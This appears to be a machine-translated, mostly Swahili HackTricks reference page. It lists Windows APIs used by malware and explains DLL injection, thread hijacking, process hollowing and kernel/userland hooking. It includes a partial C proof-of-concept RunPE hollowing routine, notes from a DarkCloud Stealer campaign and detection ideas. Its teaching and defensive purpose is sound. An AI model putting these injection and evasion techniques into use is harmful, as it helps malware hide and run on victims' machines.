Common API used in Malware

Reading time: 6 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Generic

Networking

Raw Sockets	WinAPI Sockets
socket()	WSAStratup()
bind()	bind()
listen()	listen()
accept()	accept()
connect()	connect()
read()/recv()	recv()
write()	send()
shutdown()	WSACleanup()

Persistence

Registry	File	Service
RegCreateKeyEx()	GetTempPath()	OpenSCManager
RegOpenKeyEx()	CopyFile()	CreateService()
RegSetValueEx()	CreateFile()	StartServiceCtrlDispatcher()
RegDeleteKeyEx()	WriteFile()
RegGetValue()	ReadFile()

Encryption

Name
WinCrypt
CryptAcquireContext()
CryptGenKey()
CryptDeriveKey()
CryptDecrypt()
CryptReleaseContext()

Anti-Analysis/VM

Function Name	Assembly Instructions
IsDebuggerPresent()	CPUID()
GetSystemInfo()	IN()
GlobalMemoryStatusEx()
GetVersion()
CreateToolhelp32Snapshot [Check if a process is running]
CreateFileW/A [Check if a file exist]

Stealth

Name
VirtualAlloc	Alloc memory (packers)
VirtualProtect	Change memory permission (packer giving execution permission to a section)
ReadProcessMemory	Injection into external processes
WriteProcessMemoryA/W	Injection into external processes
NtWriteVirtualMemory
CreateRemoteThread	DLL/Process injection...
NtUnmapViewOfSection
QueueUserAPC
CreateProcessInternalA/W

Execution

Function Name
CreateProcessA/W
ShellExecute
WinExec
ResumeThread
NtResumeThread

Miscellaneous

GetAsyncKeyState() -- Key logging
SetWindowsHookEx -- Key logging
GetForeGroundWindow -- Get running window name (or the website from a browser)
LoadLibrary() -- Import library
GetProcAddress() -- Import library
CreateToolhelp32Snapshot() -- List running processes
GetDC() -- Screenshot
BitBlt() -- Screenshot
InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- Access the Internet
FindResource(), LoadResource(), LockResource() -- Access resources of the executable

Malware Techniques

DLL Injection

Teua DLL isiyo ya kawaida ndani ya mchakato mwingine

Tafuta mchakato wa kuingiza DLL mbaya: CreateToolhelp32Snapshot, Process32First, Process32Next
Fungua mchakato: GetModuleHandle, GetProcAddress, OpenProcess
Andika njia ya DLL ndani ya mchakato: VirtualAllocEx, WriteProcessMemory
Unda thread katika mchakato ambayo itapakia DLL mbaya: CreateRemoteThread, LoadLibrary

Mifunction mingine ya kutumia: NTCreateThreadEx, RtlCreateUserThread

Reflective DLL Injection

Pakia DLL mbaya bila kuita simu za kawaida za Windows API.
DLL inachorwa ndani ya mchakato, itatatua anwani za uagizaji, kurekebisha uhamasishaji na kuita kazi ya DllMain.

Thread Hijacking

Pata thread kutoka kwa mchakato na ufanye ipakie DLL mbaya

Pata thread lengwa: CreateToolhelp32Snapshot, Thread32First, Thread32Next
Fungua thread: OpenThread
Suspend thread: SuspendThread
Andika njia ya DLL mbaya ndani ya mchakato wa mwathirika: VirtualAllocEx, WriteProcessMemory
Anza tena thread ikipakia maktaba: ResumeThread

PE Injection

Uhamasishaji wa Utekelezaji wa Portable: Utekelezaji utaandikwa katika kumbukumbu ya mchakato wa mwathirika na utaanzishwa kutoka hapo.

Process Hollowing (a.k.a RunPE)

Process Hollowing ni moja ya mbinu maarufu za kuepuka ulinzi / utekelezaji zinazotumiwa na malware ya Windows. Wazo ni kuzindua mchakato halali katika hali ya kusimamishwa, kuondoa (hollow) picha yake ya asili kutoka kwa kumbukumbu na nakala ya PE isiyo ya kawaida mahali pake. Wakati thread kuu hatimaye inarejelewa, kiingilio kibaya kinatekelezwa chini ya kivuli cha binary iliyoaminika (mara nyingi imesainiwa na Microsoft).

Mchakato wa kawaida:

Zindua mwenyeji mzuri (mfano RegAsm.exe, rundll32.exe, msbuild.exe) kusimamishwa ili hakuna maagizo yanayoendesha bado.

STARTUPINFOA  si = { sizeof(si) };
PROCESS_INFORMATION pi;
CreateProcessA("C:\\Windows\\Microsoft.NET\\Framework32\\v4.0.30319\\RegAsm.exe",
NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

Soma mzigo mbaya katika kumbukumbu na uchambue vichwa vyake vya PE ili kupata SizeOfImage, sehemu na EntryPoint mpya.
NtUnmapViewOfSection / ZwUnmapViewOfSection – ondoa msingi wa picha ya asili ya mchakato ulio kusimamishwa.
VirtualAllocEx – hifadhi kumbukumbu ya RWX ya SizeOfImage ndani ya mchakato wa mbali.
WriteProcessMemory – nakala ya Headers kwanza, kisha tembea juu ya sehemu ukinakili data zao za ghafi.
SetThreadContext – pata thamani ya EAX/RAX (RCX kwenye x64) au Rip katika muundo wa muktadha ili EIP iangalie kwenye EntryPoint ya mzigo.
ResumeThread – thread inaendelea, ikitekeleza msimbo uliotolewa na mshambuliaji.

Mfano wa chini wa uthibitisho wa dhana (x86):

void RunPE(LPCSTR host, LPVOID payload, DWORD payloadSize){
// 1. create suspended process
STARTUPINFOA si = {sizeof(si)}; PROCESS_INFORMATION pi;
CreateProcessA(host, NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi);

// 2. read remote PEB to get ImageBaseAddress
CONTEXT ctx; ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread,&ctx);
PVOID baseAddr;
ReadProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL);

// 3. unmap original image & allocate new region at same base
NtUnmapViewOfSection(pi.hProcess,baseAddr);
PVOID newBase = VirtualAllocEx(pi.hProcess,baseAddr,pHdr->OptionalHeader.SizeOfImage,
MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
// 4-5. copy headers & sections …
// 6. write new image base into PEB and set Eip
WriteProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL);
ctx.Eax = (DWORD)(newBase) + pHdr->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(pi.hThread,&ctx);
// 7. run!
ResumeThread(pi.hThread);
}

Practical notes observed in the DarkCloud Stealer campaign:

Loader ilichukua RegAsm.exe (sehemu ya .NET Framework) kama mwenyeji – binary iliyosainiwa ambayo haiwezekani kuvuta umakini.
Stealer ya VB6 iliyofichuliwa (holographies.exe) haiangushi kwenye diski; inakuwepo tu ndani ya mchakato uliohollowed, ikifanya ugunduzi wa statiki kuwa mgumu zaidi.
Nyimbo nyeti (regexes, paths, Telegram credentials) zime RC4-encrypted kwa kila nyimbo na zinafichuliwa tu wakati wa wakati wa kukimbia, ikifanya skanning ya kumbukumbu kuwa ngumu zaidi.

Detection ideas:

Onyo juu ya mchakato wa CREATE_SUSPENDED ambao kamwe hauunda madirisha ya GUI/console kabla ya eneo la kumbukumbu kutolewa kama RWX (nadra kwa msimbo mzuri).
Tafuta mfuatano wa wito NtUnmapViewOfSection ➜ VirtualAllocEx ➜ WriteProcessMemory kati ya michakato tofauti.

Hooking

SSDT (System Service Descriptor Table) inaelekeza kwenye kazi za kernel (ntoskrnl.exe) au dereva wa GUI (win32k.sys) ili michakato ya mtumiaji iweze kuita kazi hizi.
Rootkit inaweza kubadilisha viashiria hivi kwa anwani ambazo anadhibiti.
IRP (I/O Request Packets) hupeleka vipande vya data kutoka sehemu moja hadi nyingine. Karibu kila kitu katika kernel kinatumia IRPs na kila kituo cha kifaa kina jedwali lake la kazi ambalo linaweza kuhooked: DKOM (Direct Kernel Object Manipulation)
IAT (Import Address Table) ni muhimu kutatua utegemezi. Inawezekana kuhook jedwali hili ili kuiba msimbo ambao utaitwa.
EAT (Export Address Table) Hooks. Hizi hooks zinaweza kufanywa kutoka userland. Lengo ni kuhook kazi zilizotolewa na DLLs.
Inline Hooks: Aina hii ni ngumu kufikia. Hii inahusisha kubadilisha msimbo wa kazi yenyewe. Labda kwa kuweka jump mwanzoni mwa hii.

References

Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.